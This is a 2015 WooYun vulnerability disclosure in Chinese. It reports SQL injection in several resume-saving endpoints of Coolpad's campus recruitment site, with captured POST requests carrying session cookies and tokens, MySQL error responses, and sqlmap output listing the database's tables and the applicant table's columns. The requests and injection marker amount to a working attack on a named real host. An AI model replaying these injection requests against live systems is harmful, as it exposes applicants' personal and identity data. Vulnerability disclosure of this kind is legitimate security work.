缺陷编号:WooYun-2015-0126495
漏洞标题:手机行业安全之宇龙通信(酷派)多出处SQL注射(目测暴露用户简历)
相关厂商:yulong.com
漏洞作者:DloveJ
提交时间:2015-07-13 16:49
公开时间:2015-08-28 10:00
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:厂商已经确认
Tags标签:
2015-07-13: 细节已通知厂商并且等待厂商处理中
2015-07-14: 厂商已经确认,细节仅向厂商公开
2015-07-24: 细节向核心白帽子及相关领域专家公开
2015-08-03: 细节向普通白帽子公开
2015-08-13: 细节向实习白帽子公开
2015-08-28: 细节向公众公开
手机行业安全之宇龙通信(酷派)SQL注射(可暴露用户简历)
1 |
注入参数均为field_coolyunid= |
1 |
http://campus.coolpad.com/ |
登录,修改简历
经过测试以下修改处存在注入!0x00个人信息》编辑>保存》抓包
1 2 3 4 5 6 7 8 9 10 11 12 13 |
POST /index.php?c=submitResumes&f=savePersonalInfo HTTP/1.1<br> Host: campus.coolpad.com<br> Proxy-Connection: keep-alive<br> Content-Length: 722<br> Accept: application/json, text/javascript, */*; q=0.01<br> Origin: http://campus.coolpad.com<br> X-Requested-With: XMLHttpRequest<br> User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2438.3 Safari/537.36<br> Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br> Referer: http://campus.coolpad.com/index.php?c=submitResumes&f=resumePreview&act=edit<br> Accept-Encoding: gzip, deflate<br> Accept-Language: zh-CN,zh;q=0.8<br> Cookie: Hm_lvt_cf573ba5889953becfec5b2e08d9160d=1436762927; Hm_lpvt_cf573ba5889953becfec5b2e08d9160d=1436765094; CP_SW_U_Id=cad54902-25ab-4807-b4f6-b9e3ce88e7b5_17wff3; W_CP_T_Id=dt9_1747fb190b-6b19-4213-8a6c-1f85887146e5s1sr; nTalk_CACHE_DATA={uid:kf_9926_ISME9754_guest9C383A1B-A989-99,tid:1436762887533458}; NTKF_T2D_CLIENTID=guest9C383A1B-A989-9977-49BF-7C23C030791A; pgv_pvi=530273280; pgv_si=s2191045632; U_T=null; rememberUserNickName=32564674; isHasLogin=true; shopCart=""; glanceOverGoods=""; Hm_lvt_ed4dc0af212843677141159d85428e45=1436762877,1436768984; Hm_lpvt_ed4dc0af212843677141159d85428e45=1436768988; OZ_1U_1844=vid=v5a342fd662eea.0&ctime=1436768987<ime=1436768984; OZ_1Y_1844=erefer=http%3A//www.yulong.com/product/product/product/load.html%3FproductBO.product.id%3D6040%26productBO.menuId%3D30&eurl=http%3A//www.coolpad.com/&etime=1436768984&ctime=1436768987<ime=1436768984&compid=1844; Hm_lvt_384596db34f6f9312806bd8ba87b7dc5=1436762878,1436768985; Hm_lpvt_384596db34f6f9312806bd8ba87b7dc5=1436768988; isMobile=n; datas=%7B%22publish%22%3A%7B%22history%22%3A%5B%22%5C%2Findex.php%3Fc%3DsubmitResumes%26f%3DresumePreview%26act%3Dedit%22%5D%2C%22uid%22%3A32564674%2C%22rtncode%22%3A%220%22%2C%22openid%22%3A%2232564674%22%2C%22expires_in%22%3A%227776000%22%2C%22refresh_token%22%3A%222.e63a865568bd9e287f9f34bef92decc0%22%2C%22access_token%22%3A%222.00534006a7ec55a120825a9584f4cfbb.9185d4279dcfcd5abbe2f50ca80513f4.1436773923100%22%2C%22sex%22%3A%221%22%2C%22email%22%3A%22dongdongxuehei%40163.com%22%2C%22nickname%22%3A%22test%22%2C%22brithday%22%3A%221990-4-5%22%2C%22rtn_code%22%3A%220%22%2C%22headIconUrl%22%3A%22http%3A%5C%2F%5C%2Ffile.coolyun.com%5C%2Fgroup6%5C%2FM06%5C%2FEF%5C%2F1D%5C%2FwKgFFlWjQm-IV6LSAAAAPFVQDX8AAt9pwA9-zoAAABU437.jpg%3Fmethod%3Dgenerate%26type%3Dcrop%26width%3D256%26height%3D256%26quality%3D80%26access_token%3D101CVoAUsqc4DdqemSia8RWgznJq%252FbHKgUmZw%253D%253D%26source%3Dheadimg%26d%3D32564674%26method%3Ddownload%22%2C%22mobile%22%3A%22%22%2C%22uploadToken%22%3A%22923343d9b5cc60459390386fd1f715da%22%7D%7Dfield_coolyunid=32564674&field_preview=edit&info%5Bfield_photo%5D=public%2Fuploads%2F2015-07-13%2F14367740192603.jpg&info%5Bfield_realname%5D=%E9%83%BD%E6%98%AF&info%5Bfield_card_type%5D=idcard&info%5Bfield_idcard%5D=110101199609080097&info%5Bfield_sex%5D=gentleman&info%5Bfield_birthday%5D=1996-09-08&info%5Bfield_nation%5D=&info%5Bfield_health%5D=better&info%5Bfield_marital_status%5D=unmarried&info%5Bfield_political_status%5D=members&info%5Bfield_living_city%5D=sad&info%5Bfield_origin_palce%5D=dadad&info%5Bfield_before_colloge_residence%5D=%E5%B7%B4%E9%9F%B3%E9%83%AD%E6%A5%9E%E8%92%99%E5%8F%A4%E8%87%AA%E6%B2%BB%E5%B7%9E&info%5Bfield_graduation_time%5D=2015-01-01&info%5Bfield_height%5D=160&info%5Bfield_weight%5D=0 |
1 2 3 4 5 6 7 8 |
HTTP/1.1 200 OK<br> Date: Mon, 13 Jul 2015 08:27:31 GMT<br> Server: nginx/1.6.0<br> Content-Type: text/html; charset=utf-8<br> X-Powered-By: PHP/5.5.10<br> X-Via: 1.1 nmg29:2 (Cdn Cache Server V2.0)<br> Connection: keep-alive<br> Content-Length: 899<strong>A mysql error has occurred!</strong><br /><strong>Error Number:</strong>1064<br /><strong>Error Description:</strong>[Execute sql sentence error! SQL :(-) UPDATE `clp_seekers` SET `s_photo`='public/uploads/2015-07-13/14367740192603.jpg' , `s_realname`='齿¯' , `s_card_type`='idcard' , `s_idcard`='110101199609080097' , `s_sex`='gentleman' , `s_birthday`='1996-09-08' , `s_nation`='' , `s_health`='better' , `s_marital_status`='unmarried' , `s_political_status`='members' , `s_living_city`='sad' , `s_origin_palce`='dadad' , `s_before_colloge_residence`='å·´é³éæ¥èå¤èªæ²»å·' , `s_graduation_time`='2015-01-01' , `s_height`='160' , `s_weight`='0' WHERE `coolyun_uid`=32564674' ]:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1<br /><strong>Error Time:</strong>2015-07-13 16:27:30 |
0x01联系方式》编辑》保存》抓包
1 2 3 4 5 6 7 8 9 10 11 12 13 |
POST /index.php?c=submitResumes&f=saveConnectInfo HTTP/1.1<br> Host: campus.coolpad.com<br> Proxy-Connection: keep-alive<br> Content-Length: 163<br> Accept: application/json, text/javascript, */*; q=0.01<br> Origin: http://campus.coolpad.com<br> X-Requested-With: XMLHttpRequest<br> User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2438.3 Safari/537.36<br> Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br> Referer: http://campus.coolpad.com/index.php?c=submitResumes&f=resumePreview&act=edit<br> Accept-Encoding: gzip, deflate<br> Accept-Language: zh-CN,zh;q=0.8<br> Cookie: Hm_lvt_cf573ba5889953becfec5b2e08d9160d=1436762927; Hm_lpvt_cf573ba5889953becfec5b2e08d9160d=1436765094; CP_SW_U_Id=cad54902-25ab-4807-b4f6-b9e3ce88e7b5_17wff3; W_CP_T_Id=dt9_1747fb190b-6b19-4213-8a6c-1f85887146e5s1sr; nTalk_CACHE_DATA={uid:kf_9926_ISME9754_guest9C383A1B-A989-99,tid:1436762887533458}; NTKF_T2D_CLIENTID=guest9C383A1B-A989-9977-49BF-7C23C030791A; pgv_pvi=530273280; pgv_si=s2191045632; U_T=null; rememberUserNickName=32564674; isHasLogin=true; shopCart=""; glanceOverGoods=""; Hm_lvt_ed4dc0af212843677141159d85428e45=1436762877,1436768984; Hm_lpvt_ed4dc0af212843677141159d85428e45=1436768988; OZ_1U_1844=vid=v5a342fd662eea.0&ctime=1436768987<ime=1436768984; OZ_1Y_1844=erefer=http%3A//www.yulong.com/product/product/product/load.html%3FproductBO.product.id%3D6040%26productBO.menuId%3D30&eurl=http%3A//www.coolpad.com/&etime=1436768984&ctime=1436768987<ime=1436768984&compid=1844; Hm_lvt_384596db34f6f9312806bd8ba87b7dc5=1436762878,1436768985; Hm_lpvt_384596db34f6f9312806bd8ba87b7dc5=1436768988; isMobile=n; datas=%7B%22publish%22%3A%7B%22history%22%3A%5B%22%5C%2Findex.php%3Fc%3DsubmitResumes%26f%3DresumePreview%26act%3Dedit%22%5D%2C%22uid%22%3A32564674%2C%22rtncode%22%3A%220%22%2C%22openid%22%3A%2232564674%22%2C%22expires_in%22%3A%227776000%22%2C%22refresh_token%22%3A%222.e63a865568bd9e287f9f34bef92decc0%22%2C%22access_token%22%3A%222.00534006a7ec55a120825a9584f4cfbb.9185d4279dcfcd5abbe2f50ca80513f4.1436773923100%22%2C%22sex%22%3A%221%22%2C%22email%22%3A%22dongdongxuehei%40163.com%22%2C%22nickname%22%3A%22test%22%2C%22brithday%22%3A%221990-4-5%22%2C%22rtn_code%22%3A%220%22%2C%22headIconUrl%22%3A%22http%3A%5C%2F%5C%2Ffile.coolyun.com%5C%2Fgroup6%5C%2FM06%5C%2FEF%5C%2F1D%5C%2FwKgFFlWjQm-IV6LSAAAAPFVQDX8AAt9pwA9-zoAAABU437.jpg%3Fmethod%3Dgenerate%26type%3Dcrop%26width%3D256%26height%3D256%26quality%3D80%26access_token%3D101CVoAUsqc4DdqemSia8RWgznJq%252FbHKgUmZw%253D%253D%26source%3Dheadimg%26d%3D32564674%26method%3Ddownload%22%2C%22mobile%22%3A%22%22%2C%22uploadToken%22%3A%229d600576e1f16265f3ab7bbb2fd458ad%22%7D%7Dfield_coolyunid=32564674&cont%5Bfield_tel%5D=15099999999&cont%5Bfield_email%5D=sddsa%40qq.com&cont%5Bfield_address%5D=&cont%5Bfield_emergency_number%5D=15988880989 |
1 2 3 4 5 6 7 8 |
HTTP/1.1 200 OK<br> Date: Mon, 13 Jul 2015 08:29:50 GMT<br> Server: nginx/1.6.0<br> Content-Type: text/html; charset=utf-8<br> X-Powered-By: PHP/5.5.10<br> X-Via: 1.1 nmg29:2 (Cdn Cache Server V2.0)<br> Connection: keep-alive<br> Content-Length: 525<strong>A mysql error has occurred!</strong><br /><strong>Error Number:</strong>1064<br /><strong>Error Description:</strong>[Execute sql sentence error! SQL :(-) UPDATE `clp_seekers` SET `s_tel`='15099999999' , `s_email`='[email protected]' , `s_address`='' , `s_emergency_number`='15988880989' WHERE `coolyun_uid`=32564674' ]:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1<br /><strong>Error Time:</strong>2015-07-13 16:29:49 |
0x02技能/爱好》编辑》保存》抓包
1 2 3 4 5 6 7 8 9 10 11 12 13 |
POST /index.php?c=submitResumes&f=saveSkillsHobbiesInfo HTTP/1.1<br> Host: campus.coolpad.com<br> Proxy-Connection: keep-alive<br> Content-Length: 297<br> Accept: application/json, text/javascript, */*; q=0.01<br> Origin: http://campus.coolpad.com<br> X-Requested-With: XMLHttpRequest<br> User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2438.3 Safari/537.36<br> Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br> Referer: http://campus.coolpad.com/index.php?c=submitResumes&f=resumePreview&act=edit&r=0.38695669337175786<br> Accept-Encoding: gzip, deflate<br> Accept-Language: zh-CN,zh;q=0.8<br> Cookie: Hm_lvt_cf573ba5889953becfec5b2e08d9160d=1436762927; Hm_lpvt_cf573ba5889953becfec5b2e08d9160d=1436765094; CP_SW_U_Id=cad54902-25ab-4807-b4f6-b9e3ce88e7b5_17wff3; W_CP_T_Id=dt9_1747fb190b-6b19-4213-8a6c-1f85887146e5s1sr; nTalk_CACHE_DATA={uid:kf_9926_ISME9754_guest9C383A1B-A989-99,tid:1436762887533458}; NTKF_T2D_CLIENTID=guest9C383A1B-A989-9977-49BF-7C23C030791A; pgv_pvi=530273280; pgv_si=s2191045632; U_T=null; rememberUserNickName=32564674; isHasLogin=true; shopCart=""; glanceOverGoods=""; Hm_lvt_ed4dc0af212843677141159d85428e45=1436762877,1436768984; Hm_lpvt_ed4dc0af212843677141159d85428e45=1436768988; OZ_1U_1844=vid=v5a342fd662eea.0&ctime=1436768987<ime=1436768984; OZ_1Y_1844=erefer=http%3A//www.yulong.com/product/product/product/load.html%3FproductBO.product.id%3D6040%26productBO.menuId%3D30&eurl=http%3A//www.coolpad.com/&etime=1436768984&ctime=1436768987<ime=1436768984&compid=1844; Hm_lvt_384596db34f6f9312806bd8ba87b7dc5=1436762878,1436768985; Hm_lpvt_384596db34f6f9312806bd8ba87b7dc5=1436768988; isMobile=n; datas=%7B%22publish%22%3A%7B%22history%22%3A%5B%22%5C%2Findex.php%3Fc%3DsubmitResumes%26f%3DresumePreview%26act%3Dedit%22%5D%2C%22uid%22%3A32564674%2C%22rtncode%22%3A%220%22%2C%22openid%22%3A%2232564674%22%2C%22expires_in%22%3A%227776000%22%2C%22refresh_token%22%3A%222.e63a865568bd9e287f9f34bef92decc0%22%2C%22access_token%22%3A%222.00534006a7ec55a120825a9584f4cfbb.9185d4279dcfcd5abbe2f50ca80513f4.1436773923100%22%2C%22sex%22%3A%221%22%2C%22email%22%3A%22dongdongxuehei%40163.com%22%2C%22nickname%22%3A%22test%22%2C%22brithday%22%3A%221990-4-5%22%2C%22rtn_code%22%3A%220%22%2C%22headIconUrl%22%3A%22http%3A%5C%2F%5C%2Ffile.coolyun.com%5C%2Fgroup6%5C%2FM06%5C%2FEF%5C%2F1D%5C%2FwKgFFlWjQm-IV6LSAAAAPFVQDX8AAt9pwA9-zoAAABU437.jpg%3Fmethod%3Dgenerate%26type%3Dcrop%26width%3D256%26height%3D256%26quality%3D80%26access_token%3D101CVoAUsqc4DdqemSia8RWgznJq%252FbHKgUmZw%253D%253D%26source%3Dheadimg%26d%3D32564674%26method%3Ddownload%22%2C%22mobile%22%3A%22%22%2C%22uploadToken%22%3A%229d600576e1f16265f3ab7bbb2fd458ad%22%7D%7Dfield_coolyunid=32564674&hobb%5Bfield_english_level%5D=cet4&hobb%5Bfield_english_scores%5D=1132&hobb%5Bfield_english_certficate%5D=13&hobb%5Bfield_english_certficate_date%5D=2014-01-01&hobb%5Bfield_english_certficate_scores%5D=123&hobb%5Bfield_other_skills%5D=3&hobb%5Bfield_personal_hobbies%5D=31 |
1 2 3 4 5 6 7 8 |
HTTP/1.1 200 OK<br> Date: Mon, 13 Jul 2015 08:31:23 GMT<br> Server: nginx/1.6.0<br> Content-Type: text/html; charset=utf-8<br> X-Powered-By: PHP/5.5.10<br> X-Via: 1.1 nmg29:2 (Cdn Cache Server V2.0)<br> Connection: keep-alive<br> Content-Length: 439<strong>A mysql error has occurred!</strong><br /><strong>Error Number:</strong>1064<br /><strong>Error Description:</strong>[Execute sql sentence error! SQL :(-) SELECT COUNT(*) FROM `clp_seekers_skills_hobbies` WHERE `s_id`=32564674' ]:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1<br /><strong>Error Time:</strong>2015-07-13 16:31:23 |
》》》》》刚才看到厂商把洞确认了,没想到评了个低,没心情一个一个写了,直接跑吧,其他自己查!!《《《《《0x03其中的一个包
1 2 3 4 5 6 7 8 9 10 11 12 13 |
POST /index.php?c=submitResumes&f=saveConnectInfo HTTP/1.1<br> Host: campus.coolpad.com<br> Proxy-Connection: keep-alive<br> Content-Length: 164<br> Accept: application/json, text/javascript, */*; q=0.01<br> Origin: http://campus.coolpad.com<br> X-Requested-With: XMLHttpRequest<br> User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2438.3 Safari/537.36<br> Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br> Referer: http://campus.coolpad.com/index.php?c=submitResumes&f=resumePreview&act=edit<br> Accept-Encoding: gzip, deflate<br> Accept-Language: zh-CN,zh;q=0.8<br> Cookie: Hm_lvt_cf573ba5889953becfec5b2e08d9160d=1436762927; Hm_lpvt_cf573ba5889953becfec5b2e08d9160d=1436765094; CP_SW_U_Id=cad54902-25ab-4807-b4f6-b9e3ce88e7b5_17wff3; W_CP_T_Id=dt9_1747fb190b-6b19-4213-8a6c-1f85887146e5s1sr; nTalk_CACHE_DATA={uid:kf_9926_ISME9754_guest9C383A1B-A989-99,tid:1436762887533458}; NTKF_T2D_CLIENTID=guest9C383A1B-A989-9977-49BF-7C23C030791A; pgv_pvi=530273280; pgv_si=s2191045632; U_T=null; rememberUserNickName=32564674; isHasLogin=true; shopCart=""; glanceOverGoods=""; Hm_lvt_ed4dc0af212843677141159d85428e45=1436762877,1436768984; Hm_lpvt_ed4dc0af212843677141159d85428e45=1436768988; OZ_1U_1844=vid=v5a342fd662eea.0&ctime=1436768987<ime=1436768984; OZ_1Y_1844=erefer=http%3A//www.yulong.com/product/product/product/load.html%3FproductBO.product.id%3D6040%26productBO.menuId%3D30&eurl=http%3A//www.coolpad.com/&etime=1436768984&ctime=1436768987<ime=1436768984&compid=1844; Hm_lvt_384596db34f6f9312806bd8ba87b7dc5=1436762878,1436768985; Hm_lpvt_384596db34f6f9312806bd8ba87b7dc5=1436768988; isMobile=n; datas=%7B%22publish%22%3A%7B%22history%22%3A%5B%22%5C%2Findex.php%3Fc%3DsubmitResumes%26f%3DresumePreview%26act%3Dedit%22%5D%2C%22uid%22%3A32564674%2C%22rtncode%22%3A%220%22%2C%22openid%22%3A%2232564674%22%2C%22expires_in%22%3A%227776000%22%2C%22refresh_token%22%3A%222.e63a865568bd9e287f9f34bef92decc0%22%2C%22access_token%22%3A%222.00534006a7ec55a120825a9584f4cfbb.9185d4279dcfcd5abbe2f50ca80513f4.1436773923100%22%2C%22sex%22%3A%221%22%2C%22email%22%3A%22dongdongxuehei%40163.com%22%2C%22nickname%22%3A%22test%22%2C%22brithday%22%3A%221990-4-5%22%2C%22rtn_code%22%3A%220%22%2C%22headIconUrl%22%3A%22http%3A%5C%2F%5C%2Ffile.coolyun.com%5C%2Fgroup6%5C%2FM06%5C%2FEF%5C%2F1D%5C%2FwKgFFlWjQm-IV6LSAAAAPFVQDX8AAt9pwA9-zoAAABU437.jpg%3Fmethod%3Dgenerate%26type%3Dcrop%26width%3D256%26height%3D256%26quality%3D80%26access_token%3D101CVoAUsqc4DdqemSia8RWgznJq%252FbHKgUmZw%253D%253D%26source%3Dheadimg%26d%3D32564674%26method%3Ddownload%22%2C%22mobile%22%3A%22%22%7D%7Dfield_coolyunid=32564674*&cont%5Bfield_tel%5D=15099999999&cont%5Bfield_email%5D=sddsa%40qq.com&cont%5Bfield_address%5D=&cont%5Bfield_emergency_number%5D=15988880989 |
交给sqlmap
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 |
Database: coolpadjobdb<br> [35 tables]<br> +---------------------------------+<br> | clp_college |<br> | clp_college_department |<br> | clp_count_position |<br> | clp_department |<br> | clp_department_managers |<br> | clp_hiring |<br> | clp_hiring_employ |<br> | clp_hiring_first |<br> | clp_hiring_second |<br> | clp_lecture |<br> | clp_managers |<br> | clp_managers_area |<br> | clp_position |<br> | clp_position_city |<br> | clp_position_interviewarea |<br> | clp_position_type |<br> | clp_position_workarea |<br> | clp_preach_plan |<br> | clp_province |<br> | clp_ranks |<br> | clp_recruit_area |<br> | clp_recruitment_dynamics |<br> | clp_seekers |<br> | clp_seekers_active |<br> | clp_seekers_audition |<br> | clp_seekers_behave |<br> | clp_seekers_connection |<br> | clp_seekers_education |<br> | clp_seekers_family_relationship |<br> | clp_seekers_practice_experience |<br> | clp_seekers_project_experience |<br> | clp_seekers_self_evaluation |<br> | clp_seekers_skills_hobbies |<br> | statistics_datas |<br> | statistics_status |<br> +---------------------------------+ |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 |
Database: coolpadjobdb<br> Table: clp_seekers<br> [38 columns]<br> +----------------------------+--------------------------------------------------<br> ----------------------+<br> | Column | Type<br> |<br> +----------------------------+--------------------------------------------------<br> ----------------------+<br> | coolyun_uid | int(9)<br> |<br> | s_address | varchar(420)<br> |<br> | s_before_colloge_residence | varchar(45)<br> |<br> | s_birthday | timestamp<br> |<br> | s_card_type | enum('idcard','other')<br> |<br> | s_edit_date | datetime<br> |<br> | s_email | varchar(24)<br> |<br> | s_emergency_contact | varchar(72)<br> |<br> | s_emergency_contact_tel | varchar(18)<br> |<br> | s_emergency_number | varchar(42)<br> |<br> | s_eng_rank_goal | varchar(12)<br> |<br> | s_eng_rank_type | enum('CET4','CET6','PETS','IELTS','TOFEL','TEM4',<br> 'TEM8','BEC','CATTI') |<br> | s_expect_graduation | timestamp<br> |<br> | s_graduation_time | datetime<br> |<br> | s_health | enum('better','nice','bad')<br> |<br> | s_height | int(4)<br> |<br> | s_iconb | varchar(420)<br> |<br> | s_icons | varchar(420)<br> |<br> | s_id | int(8)<br> |<br> | s_idcard | varchar(20)<br> |<br> | s_living_city | varchar(45)<br> |<br> | s_marital_status | enum('married','unmarried','divorce','secret')<br> |<br> | s_name | varchar(72)<br> |<br> | s_nation | varchar(32)<br> |<br> | s_origin_palce | varchar(128)<br> |<br> | s_other_eng_rank_goal | varchar(12)<br> |<br> | s_other_eng_rank_type | enum('CET4','CET6','PETS','IELTS','TOFEL','TEM4',<br> 'TEM8','BEC','CATTI') |<br> | s_other_lang_rank | varchar(300)<br> |<br> | s_password | varchar(32)<br> |<br> | s_photo | varchar(300)<br> |<br> | s_political_status | enum('members','party','other')<br> |<br> | s_portrait | varchar(360)<br> |<br> | s_realname | varchar(24)<br> |<br> | s_save_date | datetime<br> |<br> | s_sex | enum('lady','gentleman')<br> |<br> | s_tel | varchar(18)<br> |<br> | s_wechat | varchar(24)<br> |<br> | s_weight | int(4)<br> |<br> +----------------------------+--------------------------------------------------<br> ----------------------+ |
这表示是什么,我不知道,自及看吧!
坐在这里写这么多,就不能给个20,上一个给低,这样真的好么?
给个高20rank可好?
危害等级:高
漏洞Rank:12
确认时间:2015-07-1409:58
您好,我们秉着公平公正的原则,依据漏洞发现难度、利用难度、造成的危害程度对漏洞做出较中肯的评价,感谢您对酷派安全的关注。
暂无
大牛边拿卡边发洞哈。
@江苏苏宁易购电子商务有限公司 你是刚才发购物卡的帅哥,@@
@江苏苏宁易购电子商务有限公司 挖了个你们的洞,没审核呢
原文连接
的情况下转载,若非则不得使用我方内容。